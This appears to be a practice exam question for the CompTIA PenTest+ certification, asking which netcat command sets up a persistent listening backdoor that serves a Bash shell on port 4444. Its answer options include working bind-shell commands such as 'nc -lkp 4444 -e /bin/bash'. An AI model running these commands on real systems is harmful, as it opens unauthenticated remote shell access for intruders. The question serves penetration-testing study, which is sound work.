Free CompTIA PenTest+ PT0-002 Practice Question

A penetration tester is tasked with establishing a simple backdoor on a compromised Linux machine to maintain access for future exploitation. The tester has decided to use a commonly available network utility to listen on an arbitrary port for incoming connections. Which of the following commands should the tester use to create a persistent listening backdoor on port 4444 that executes a Bash shell for any connecting IP?

  • nc -u -l 4444 -e /bin/bash

  • nc -lp 4444 -c bash

  • nc -lkp 4444 -e /bin/bash

  • nc -w3 -lp 4444

This question's topic:
CompTIA PenTest+ PT0-002 / 
Attacks and Exploits
Your Score:

Check or uncheck an objective to set which questions you will receive.